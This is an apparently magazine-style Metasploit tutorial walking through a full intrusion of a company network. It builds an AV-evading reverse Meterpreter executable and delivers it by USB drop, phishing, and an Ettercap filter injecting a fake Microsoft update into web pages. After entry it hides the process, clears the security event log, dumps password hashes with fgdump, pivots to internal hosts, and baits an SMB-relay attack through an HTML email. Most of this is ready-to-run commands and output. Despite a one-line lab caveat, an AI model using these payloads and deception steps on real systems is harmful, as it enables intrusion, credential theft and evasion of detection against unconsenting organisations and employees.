Msfpayload
Msfpayload
Msfpayload
So – Metasploit?
The Metasploit Framework is a program and subproject developed by Metasploit LLC. It was
initially created in 2003 in the Perl programming language, but was later completely re-written in
the Ruby Programming Language. As of the most recent release (3.2), released under the BSD
licensing scheme (to make it truly Open Source, as opposed to its previous Metasploit License
which made it partially Open Source).
Metasploit aims to provide an exploit development framework for Penetration Testers, as well as to
simplify the process of exploit development. Exploits are bits of code or scripts that will take
advantage of a vulnerability in a program, and perform unauthorized actions. Examples of such
actions include the execution of arbitrary code, the crashing or a particular program, or DoS of a
particular system or service. Exploits are used by Penetration Testers to test various programs on a
network for vulnerabilities (before hackers/crackers are able to), so that they can be fixed. They are
also used and abused by “script kiddies” or “Black Hats” to break into systems. Typically, a
vulnerability researcher would have to go through the cycle of Discovery > Disclosure > Analysis >
Exploit Development > Testing > Release. However, since the release of Metasploit, exploit
development is now quite a simple process that even an amateur coder can accomplish. It also
serves as a development platform for payloads (the code executed after an exploit has successfully
been run), payload encoders (to obscure data so that Intrusion Detection Systems [IDS] and
Intrusion Protecion Systems [IPS] don't pick up and block the exploit), and various other tools. The
Metasploit Project also contains a NOOP Code Database (set of Assembly language instructions for
the processor).
Metasploit has a few distinct advantages for penetration testers. One of them is that you can use
Metasploit to test an exploit (whether it's your own or someone else's) on all the machines on a
network simultaneously, and have it automatically exploit and gain you an Administrative shell on
each system. You can also feed it results from other programs (such as Nmap or Nessus – usage
instructions for these can be found on the vendor website, or at http://greyhat-security.com/) and use
that to target only specific services in a network wide exploit session. It also simplifies the job of a
penetration tester in the sense that they are able to start up Metasploit, leave it running by itself in
the background, and proceed to attempt other Network Penetration Tests. A distinct advantage that
is good for a quick preliminary vulnerability assessment is Metasploit's ability to integrate with
Nmap to perform an action known as “Autopwning” (read more about it below).
Additionally, if a compromised box has two or more separate subnets or NIC's (Network Interface
Cards), then the Penetration Tester can add a tunnel through this box via Metasploit, and is therefore
able to interact with or exploit the machines on the separate subnet which the Penetration Tester
could not initially access. Aside from Metasploit's sheer power and ease of use, it also allows
Forensic Avoidance tools and a number of other IDS evasion techniques to be executed. The 3.0
branch of the development also allows developers to code their own plug-ins, allowing for an
unlimited number of options (limited only by creativity and personal ability).
The Metasploit Framework has a number of different interfaces which a user can choose to interact
with. The command line interface is the interface of choice for most Linux users, due to its
simplicity and light-weight nature. It is operated through a series of commands. It allows the user
to: choose an exploit and a payload, show options for both of these, configure options for both of
these, choose a platform, and launch the exploit. The Web interface is the UI of choice for most
Windows users, as the separate command line isn't always guaranteed to be stable – the web
interface contains a built-in command line, as well as a graphical exploitation option. This can be
started by going to Start Menu > Programs > Metasploit Framework > MSFWeb, and the firing up
your web browser and going to http://127.0.0.1:55555. The MSF (Metasploit Framework) GUI is
also a popular option for Windows users, as it feels more like a conventional “program” than a
command line, and is what most Windows users are comfortable with. There is also a Metasploit
daemon, which is a Metasploit command line tool that listens for, and interacts with, remote
connections.
The MSF focuses on simplicity for the Penetration Tester. For example, the following code is from
the body of the Kerio Firewall 2.1.4 Authentication Packet Overflow exploit:
Code Listing 1:
connect
print_status("Trying target #{target.name}...")
sploit = make_nops(4468) + payload.encoded
sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV')
sock.put(sploit)
sock.get_once(-1, 3)
handler
disconnect
A powerful feature of the MSF that simplifies the post-exploitation process is the Meterpreter
module, which is injected directly into a running process on the exploited system, aiding in IDS
evasion, and assisting in avoidance of detection by the user. In a penetration test, a lot of focus is
placed on information gathering and exploitation, not a lot of importance is given to the power of
the post-exploitation phase. It is during this period that the most damage is done, and this is where
Meterpreter becomes quite handy. Meterpreter aims to avoid HIDS (Host Intrusion Detection
Systems) by injecting itself into the running process, as well as providing the attacker with a
platform on which further scripts can be coded and launched. It is an injected attack platform. It
also supports port forwarding in a manner similar to SSH. The MSF Project also has support for
database integration, so it can output and interact with various databases, such as Postgres or
SQLite.
This will bring up the main Metasploit console prompt. Once this is done, you have many options.
The first step (after scanning your target system for open ports/services) is to show the available
exploits:
show exploits
This will bring up a list of all of them. The list will look similar to the following:
For this example, we will choose the recent Microsoft MS08_067 exploit. To select it, you type
“use”, and the name of the exploit as displayed on the left:
use windows/smb/ms08_067_netapi
This will select that desired exploit. Now, we need to take a look at the options (you can also see the
vulnerable systems available with the “show targets” command – this is not required for this exploit
however):
show options
Those are the basic usage steps behind a simple Metasploit exploitation. There are also a number of
options for you to explore on your own; things such as encoding payloads to avoid Anti-Virus and
IDS, constructing your own exploits, payload generated executables, automated post-exploitation
scripts, and numerous other tricks of the trade. Lets take a look at some of them.
We will now examine some other features and tricks of the MSF.
Most corporate firewalls are effective because they are configured to block all incoming requests
that don't fit a certain autorized criteria, and any incoming requests that originated without an initial
outgoing request. The downside to these firewalls is that they are often configured to not block any
outgoing requests (to enable a productive work environment), or configured to not block outgoing
requests on certain ports (such as 21/FTP, 22/SSH, 80/HTTP, 8080/HTTProxy, etc.) Using
Metasploit, we can take advantage of this weakness. Now, you might be wondering how we can get
inside, if the only things that can get through are outgoing requests (such as the user browsing the
Internet, or a remote Network Attached Storage [NAS] that the company interacts with). It's simple.
We make the user request a connection to us. Not by asking them, but by combining Metasploit and
a little social engineering, or brief physical access. This is possible because Metasploit's payloads
aren't just available for use in exploitation.. They can also be compiled into binary files (in the form
of either Windows .exe's, or Linux binaries). And now, thanks do the MSF 3.2 release, they can be
encoded so they avoid Anti-Virus detection. We will be taking advantage of the binary generation as
well as the encoder. Combining Metasploit with the power of the Meterpreter (Metasploit's
powerful post-exploitation shell), and using the outgoing protocol weakness in the firewall we can
get into the company. Once we are past the firewall, we will merge the Meterpreter process with a
Windows System process to avoid further detection, gather more info about the company and the
internal network, and then route through the exploited box to attack the internal server. Shall we
begin?
Just as an initial note, I advise you only do this on your own LAN at home, or in a specifically
designed Penetration Testing Lab for your first time, until you get used to it and familiar with
Meterpreter and the Metasploit interface. If you are doing this remotely, replace all LAN addresses
with your WAN address, and make sure that your router and firewall a appropriately forwarding all
requests to the listening machine. Ideally, you'll be DMZ'ing all Port 5555 (in this case) traffic to
your listening host. We will be using BackTrack on Linux as our intrusion system , and Windows as
our target (because most employees use Windows in the workplace).
First up, fire up BackTrack (or your equivalent Linux system). We will need to update Metasploit to
the latest version. Open up the console, and type the following commands:
bt ~ # cd /pentest/exploits/framework3/
bt ~ # svn co http://metasploit.com/svn/framework3/trunk/
This should have updated Metasploit with the latest version. Now, we will need to generate our
executable to use in this Pentest. We will be using the Reverse TCP Meterpreter payload (windows/
meterepreter/reverse_tcp), which gets the payload (our generated executable) to connect to our
listening host from the inside. Type this in the same console:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2
LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe
Now, let's analyze this command. The first part tells “msfpayload” to use the Meterpreter Reverse
TCP payload, with the Local Host of 192.168.1.2, and the Local Port of 5555. This is where any
machine that runs the executable will try to connect . This is output as “Raw” shellcode (as
indicated by the 'R') and then piped through to “msfencode”. We specified -b ''; no bad characters to
avoid (though you can include characters as well, for example: -b '\x00\xff' ). We specify the type of
output as an executable, and the output file as output.exe – simple, yet effective. This executable is
our little reverse connector that we will need to get inside of the company. Put it aside for the
moment. We need to set up a listener since this is a reverse connection, and we need something to
accept it on our end. In the same window start up the MSF console and then set up the listener:
bt ~ # ./msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.2
msf > set LPORT 5555
msf > show options
msf > exploit
After this, you will need to convince the person to run it. We will cover that in a minute, but just for
argument sake this is what it will look like once they have run it:
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191
bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.2:5555 ->
192.168.1.3:1138)
meterpreter >
This is what you'll see once they've run the program. This will eventually be your little control
terminal over the entire network. There are a number of ways of get someone on the inside to run it.
First you could purchase a cheap flash drive, copy the file as a hidden file onto the flash drive, and
cause it to autorun as soon as it's inserted into a computer. You could then “conveniently” drop this
flash drive outside the building, or a specific employees locker, where curiosity will take over.
Someone will plug it into the computer to test it out. It will run and you will get the command
session. A second idea could be to attach it to an email. Use a bit of social engineering on a targeted
employee to convince them to run the program.
A third option would be to use a form of MiTM (Man in the Middle) attack to add frames into all
web pages, informing people that they need to perform an official update of their system by clicking
on the link, which will download your program to run. For this section, we will be working with
“Ettercap” and some Ettercap filters – you can read a full tutorial on how to use Ettercap for MiTM
attacks in one of my previous articles in Hakin9. Initially, we'll need to start a web server on
BackTrack. Go to: K Menu > Services > HTTPD > Start HTTPD CGI. Now, we will need to copy
the “output.exe” file we generated before to the root directory of the web server. Open up a
terminal, and type:
bt ~ # cp /pentest/exploits/framework3/output.exe /var/www/htdocs/
output.exe
Now, we will need to make the Ettercap filter to actually add the frame to the webpage. In that same
terminal, type:
bt ~ # kedit web.filter
And in the page that pops up, copy and paste the following (changing the appropriate variables):
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "<title>")) {
replace("</title>", "</title><form
action="http://192.168.1.3/output.exe" method="link"><img
src="http://192.168.1.3/security.png"><INPUT TYPE=submit value="Download
Security Update"></form><html><body><h10>Your PC is vulnerable and needs to be
updated. The Microsoft Bulletin ID is MS08_067. Please update by downloading the
program and running the update. For more information, see <a
href=http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx”>here</a><
/h10></body></html>");
msg("html injected");
}}
For the “security.png” file, consider using one like http://tinyurl.com/hakin9shield – it's large,
professional, and makes sure it's seen. However, it may also be an idea to resize it so it's not too
overbearing. Adjust the file to suit your situation, and click “Save” and then close “Kedit”. In the
same terminal, we will now turn that filter into a file usable by Ettercap, then start up Ettercap.
bt ~ # etterfilter web.filter web.ef
bt ~ # ettercap -T -q -F web.ef -M arp:remote /192.168.1.1-255/ -P
autoadd
Provided you have Metasploit's exploit handler listening, all you have to do is wait until someone
falls for your trick, and you'll have a Meterpreter session. After that, if you want to make it seem
realistic, you can cancel Ettercap with “q”. If you can't get it working for some reason, I upload a
copy of it to my site: http://greyhat-security.com/html.ef – keep in mind, you'll need to have the
same variables as I did for it to work.
Now, we will take a look at a few possible options once you have this command session.
First up, you'll want to hide the process, so there's no obvious additional programs running. Type
“ps” to see a list of processes. You should see something similar to the following:
240 output.exe C:\Documents and Settings\Fail User\My
Documents\output.exe
404 smss.exe \SystemRoot\System32\smss.exe
484 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
528 services.exe C:\WINDOWS\system32\services.exe
540 lsass.exe C:\WINDOWS\system32\lsass.exe
716 svchost.exe C:\WINDOWS\system32\svchost.exe
768 svchost.exe C:\WINDOWS\System32\svchost.exe
1156 Explorer.EXE C:\WINDOWS\Explorer.EXE
1184 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1316 RUNDLL32.EXE C:\WINDOWS\System32\RUNDLL32.EXE
1324 ctfmon.exe C:\WINDOWS\System32\ctfmon.exe
1332 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
1584 nvsvc32.exe C:\WINDOWS\System32\nvsvc32.exe
1928 WinVNC.exe C:\Program Files\TightVNC\WinVNC.exe
As you can see, our software (output.exe) is still running. We will use the “migrate” command to
merge out process with “svchost.exe”, which runs a PID of 716. Type the following command:
meterpreter > migrate 716
Process list
============
As you can see, our process has all but disappeared. Now that we are a little less obviously in their
system, we have more time to complete our operations. Basic operation commands can be seen by
typing “help”. Some important ones that you may use:
download – It's a pretty obvious one, but it allows you to download remote files to your local PC.
Basic usage is this:
download [options] src1 src2 src3 ... destination
OPTIONS:
-r Download recursively.
For example, we change to a directory (C:\Documents and Settings\Fail User\) and then download
their “My Documents” folder:
download -r “My Documents” /home/root/Documents
upload – Upload is the same basic idea, just in reverse (upload instead of download). Usage is
exactly the same format.
execute – This will be a useful command to remember. It allows you to execute commands on
the system and also to interact with them. You could use this to execute a program you uploaded, or
interact with a windows Cmd shell on the local system, etc. Typical usage is:
Usage: execute -f file [options]
OPTIONS:
For example, to execute a command prompt hidden from their view, and interact with it, type:
execute -f cmd.exe -c -H -i
run – This can be used to run ruby scripts, such as the following from Chris Gates:
print_line("Clearing the Security Event
Log, it will leave a 517 event\n")
log = client.sys.eventlog.open('security')
log.clear
hashdump – This can only be used if you type “use priv” beforehand. When you do, and
then you type “hashdump”, you will get a dump of all the local user account passwords, which
you can then crack with Ophcrack or a similar program.
Another idea could be to generate a reverse-vnc executable in the same way we did with
Meterpreter. Set up another listener, upload the generated payload, and get it to execute remotely
using the Meterpreter session. This will give us a VNC on the remote PC.
Another handy trick is to use the exploited PC to pivot through, in order to exploit other PC's inside
the network that are not accessible externally (such as the internal server). To do this in your current
session, you'll need to do a few things. First off, you'll need to type “route” to see the current
network configuration. You should get an output like this:
meterpreter > route
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.1.1
127.0.0.0 255.0.0.0 127.0.0.1
192.168.1.0 255.255.255.0 192.168.1.3
192.168.1.3 255.255.255.255 127.0.0.1
192.168.1.255 255.255.255.255 192.168.1.3
224.0.0.0 240.0.0.0 192.168.1.3
255.255.255.255 255.255.255.255 192.168.1.3
Then we'll need to take note of the local subnet (192.168.1.0), and then background the meterpreter
session by pressing “Ctrl + Z” and then typing “y”:
meterpreter > ^Z
Background session 1? [y/N] y
This will enable us to add a local route for metasploit. We will now use the “route add”
command, in the format:
route add <subnet> <netmask> <session-id>
We get:
msf exploit(handler) > route add 192.168.1.0 255.255.255.0 1
We can then do an Nmap scan (still from the backgrounded session console) to find more
vulnerabilities, hosts, etc., and then proceed to exploit further hosts with Metasploit and interact
with those sessions. Let's take a look at a few of these in action:
To start, we'll do a dump of local passwords. Go grab a copy of fgdump from http://www.foofus.net/
fizzgig/fgdump/downloads.htm and unarchive that to your local Metasploit Directory. Now, upload
it, and execute it, using the technicues you learnt before. Then, we will download a copy of the
passwords, and delete it from the remote PC:
meterpreter > upload fgdump.exe fgdump.exe
meterpreter > execute -f fgdump.exe -i -H
meterpreter > download 127.0.0.1.pwdump
These passwords can be cracked either with Ophcrak, or John the Ripper (or any similar program).
However, in this case the user was unpassworded. Lets say we couldn't reach the server
(192.168.1.1) from the outside, but because we have a shell, we have a chance to exploit it. Let's
add the route as stated before:
meterpreter > ^Z
Background session 1? [y/N] y
msf exploit(handler) > route add 192.168.1.0 255.255.255.0 1
msf exploit(handler) > route print
Now, e-mail a targeted user (preferably an administrative user) with an HTML email, referencing an
image in the following way:
<img src=//192.168.1.2/logo.jpg>
Provided that user has administrative authentication, your MSF will authenticate with it and receive
a shell session in which you can perform exactly the same actions as the previous shell. This is just
an alternative method of bypassing certain outside restrictions.
I'd also like to take the time to thank a few people and groups who helped with various testing and
discussions over the course of this article: Aneta Zysk, Tim Goddard, Stuart Burfield, and Harley
Cummins for their willingness to participate with remote testing. H.D. Moore and the Metasploit
team for providing such a useful tool. Jesse for his motivation. And finally, the guys from TRH for
all your help in providing remote shells where needed (for testing purposes).
Appendix
http://en.wikipedia.org/wiki/Metasploit
http://metasploit.com
http://en.wikipedia.org/wiki/SMBRelay
http://microsoft.com/technet/sysinternals/utilities/psexec.mspx
Syngress Press – Metasploit Toolkit for Penetration Testing, Exploit Development, and
Vulnerability Research - Copyright © 2007 by Elsevier, Inc. All rights reserved.